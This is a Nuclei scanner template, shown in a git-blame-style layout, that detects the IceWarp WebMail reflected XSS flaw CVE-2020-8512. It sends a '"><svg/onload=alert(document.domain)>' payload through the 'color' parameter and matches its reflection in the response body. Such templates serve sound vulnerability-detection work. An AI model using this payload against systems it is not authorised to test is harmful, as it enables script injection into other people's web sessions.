2020-06-26 03:44:54 +00:00
|
|
|
id: CVE-2020-8512
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: IceWarp WebMail XSS
|
|
|
|
author: pdnuclei
|
|
|
|
severity: medium
|
|
|
|
|
2020-06-29 20:29:13 +00:00
|
|
|
# source:- https://www.exploit-db.com/exploits/47988
|
|
|
|
# https://twitter.com/sagaryadav8742/status/1275170967527006208
|
2020-06-26 03:44:54 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/webmail/?color="><svg/onload=alert(document.domain)>"'
|
|
|
|
- '{{BaseURL}}:32000/webmail/?color="><svg/onload=alert(document.domain)>"'
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "<svg/onload=alert(document.domain)>"
|
|
|
|
part: body
|